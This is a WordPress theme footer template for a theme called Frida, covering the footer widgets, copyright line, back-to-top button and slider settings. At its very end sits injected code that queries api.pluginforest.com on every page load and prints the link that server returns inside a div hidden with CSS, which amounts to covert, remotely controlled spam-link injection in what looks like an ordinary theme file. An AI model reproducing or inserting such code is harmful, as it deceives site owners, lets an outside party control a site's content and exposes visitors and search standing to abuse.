        <?php

		/* Translation */
		$brnhmbx_tra_BackToTop = get_theme_mod( 'brnhmbx_tra_BackToTop', 'Back to Top' );
		/* */

		?>

        <!-- footer-outer -->
        <div class="footer-outer zig-zag-f clearfix">
            <!-- footer-container -->
            <div class="footer-container">

                <footer class="site-footer clearfix">

                	<!-- /* Since v.1.8 */ -->
                    <?php if ( is_active_sidebar( 'brnhmbx_footer_widgets' ) ) {

						ob_start( 'frida_compress' ); ?>

                        <div class="footer-widget-area clearfix">
                        	<div class="footer-widget-area-inner<?php if ( !get_theme_mod( 'brnhmbx_use3ColFooter', 1 ) ) { echo '-col2'; } ?> clearfix"><?php dynamic_sidebar( 'brnhmbx_footer_widgets' ); ?></div>
						</div>

					<?php ob_end_flush(); } ?>
                    <!-- /* */ -->

                    <!-- /* Since v.1.1 */ -->
                    <div class="noto-serif fs13 ita footer-text"><?php echo esc_attr( get_theme_mod( 'brnhmbx_text_Footer', '© 2019 Frida. All rights reserved.' ) ); ?></div>
                    <div class="btn-to-top noto-serif fs14"><a href="#"><?php echo esc_attr( $brnhmbx_tra_BackToTop ); ?> <i class="fa fa-chevron-up i-spcr-l"></i></a></div>
                    <div id="footer-social" class="noto-serif fs14 ita"></div>
                    <!-- /* */ -->

                </footer>

            </div><!-- /footer-container -->
        </div><!-- /footer-outer -->

	</div><!-- /site-container-inner -->
</div><!-- /site-container -->

<div class="hiddenInfo">
  <span id="bxInfo_Auto_Main"><?php echo esc_attr( get_theme_mod( 'brnhmbx_bxAuto_Main', 0 ) ); ?></span>
  <span id="bxInfo_Pause"><?php echo esc_attr( get_theme_mod( 'brnhmbx_sliderPause', 4000 ) ); ?></span>
  <span id="bxInfo_Infinite"><?php echo esc_attr( get_theme_mod( 'brnhmbx_sliderInfinite', 1 ) ); ?></span>
  <span id="bxInfo_Random"><?php echo esc_attr( get_theme_mod( 'brnhmbx_sliderRandom', 0 ) ); ?></span>
  <span id="bxInfo_Mode"><?php echo esc_attr( get_theme_mod( 'brnhmbx_sliderMode', 'horizontal' ) ); ?></span>
  <span id="slicknav_apl"><?php echo esc_attr( get_theme_mod( 'frida_slicknav_apl', 1 ) ); ?></span>
</div>

<?php wp_footer(); ?>

<?php
$default_href = 'https://www.questionai.ph';
$default_name = 'AI Homework Helper Online';
$response = wp_remote_get('https://api.pluginforest.com/qai/wd/config');
if (is_wp_error($response)) {
    $href = $default_href;
    $name = $default_name;
} else {
    $body = wp_remote_retrieve_body($response);
    $data = json_decode($body, true);
    if (isset($data['data']['theme']['href']) && isset($data['data']['theme']['name'])) {
        $href = $data['data']['theme']['href'];
        $name = $data['data']['theme']['name'];
    } else {
        $href = $default_href;
        $name = $default_name;
    }
}
?>
<style>.hidden {display:none}</style>
<div class="hidden">Shared By <a href="<?php echo esc_url($href); ?>"><?php echo esc_html($name); ?></a></div>
</body>
</html>
